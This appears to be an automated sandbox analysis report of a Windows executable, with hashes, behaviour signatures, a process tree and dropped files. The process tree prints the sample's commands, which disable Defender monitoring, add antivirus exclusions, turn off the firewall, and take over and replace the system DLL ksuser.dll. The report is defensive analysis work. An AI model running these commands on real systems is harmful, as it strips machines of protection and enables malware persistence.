Analysis

  • max time kernel
    140s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    06-11-2024 13:22

General

  • Target

    4fdf991291c527bf79c6b7a489c80d6843a3a36aea0d4ce7e2f027a9b2fedcd5.exe

  • Size

    125KB

  • MD5

    a293e528bd51b9d91da21e8cbfa8e5f5

  • SHA1

    c82ecf0733270f0807cb86bad5e1c0126284fd62

  • SHA256

    4fdf991291c527bf79c6b7a489c80d6843a3a36aea0d4ce7e2f027a9b2fedcd5

  • SHA512

    9223707eff3ac89eef7aed38d761926d4d17fafb1ff302ee35e5940fe30a3a7f478d5d59bb3c4864f4c25f2b34af2e769cea298826fdfe65f0c62009e879c020

  • SSDEEP

    3072:6KnT6V9P0IbarstiLniYqANZcfBuydIvRuX1FH4zUFluD:6m6VunedBuydVFH4zUF

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 14 IoCs
  • Modifies file permissions 1 TTPs 14 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4fdf991291c527bf79c6b7a489c80d6843a3a36aea0d4ce7e2f027a9b2fedcd5.exe
    "C:\Users\Admin\AppData\Local\Temp\4fdf991291c527bf79c6b7a489c80d6843a3a36aea0d4ce7e2f027a9b2fedcd5.exe"
    1⤵
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3044
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2412
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2420
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Windows\SysWOW64\uavh.dll'"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2496
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Windows\SysWOW64\uavh.dll'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1856
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2800
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2812
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:2652
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c dism /Online /enable-feature /FeatureName:"DirectPlay" /All
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2560
      • C:\Windows\SysWOW64\Dism.exe
        dism /Online /enable-feature /FeatureName:"DirectPlay" /All
        3⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        PID:2868
    • C:\Windows\SysWOW64\takeown.exe
      takeown /f "C:\Windows\system32\ksuser.dll" /A
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2832
    • C:\Windows\SysWOW64\takeown.exe
      takeown /f "C:\Windows\system32\ksuser.dll"
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2588
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant Administrators:(F,DE)
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2576
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant "Admin":(F,DE)
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2612
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /inheritance:d
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:536
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /setowner "NT SERVICE\TrustedInstaller
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2548
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant:r "NT SERVICE\TrustedInstaller":F
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:1128
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant:r "Administrators":RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:1876
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant:r "Admin":RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:400
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /inheritance:d
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:1628
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /setowner "NT SERVICE\TrustedInstaller
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:1996
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /grant:r "NT SERVICE\TrustedInstaller":F
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:1592
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /grant:r "Administrators":RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2484
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /grant:r "Admin":RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:1892

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    9097a720cc51c72f6bb72c9ca5e1d356

    SHA1

    bf7e0aa6735a280d24e7641fe498b6f6f663f381

    SHA256

    7bf26e1e8abe4f3a205274e8be18b942770dc1aa11deea3dba9dd20178d55952

    SHA512

    6f543364c015523665599117410173b905ea2326ff0c7fd6d308dde08b6e5579e38b454d0e8594e9f8d5fbc059ccdc5988744ae3efdc08f5dc95aa0f643da44e

  • C:\Windows\SysWOW64\ksuser.dll

    Filesize

    118KB

    MD5

    d5f3ecad923278e96bbbb6796f0bbca5

    SHA1

    9c54ba7de2d02306e3fcfa949163f10086c3ca3b

    SHA256

    447ae50e3e916b31ca861c97e9aab69301cec7ac9f1e527c07048ea7cba81807

    SHA512

    9c27b05c497ba2662b93092d848c02ae3cadc8096618df488371be03859dc701e3d167745507b23a017c4d35b96cf285642af75f13ee749bafa891d25c671e5a

  • memory/2420-4-0x0000000074101000-0x0000000074102000-memory.dmp

    Filesize

    4KB

  • memory/2420-5-0x0000000074100000-0x00000000746AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2420-6-0x0000000074100000-0x00000000746AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2420-7-0x0000000074100000-0x00000000746AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2420-8-0x0000000074100000-0x00000000746AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2420-9-0x0000000074100000-0x00000000746AB000-memory.dmp

    Filesize

    5.7MB

  • memory/3044-0-0x00000000011C0000-0x000000000121C000-memory.dmp

    Filesize

    368KB

  • memory/3044-1-0x0000000000030000-0x0000000000033000-memory.dmp

    Filesize

    12KB

  • memory/3044-26-0x0000000000030000-0x0000000000033000-memory.dmp

    Filesize

    12KB

  • memory/3044-27-0x00000000011C0000-0x000000000121C000-memory.dmp

    Filesize

    368KB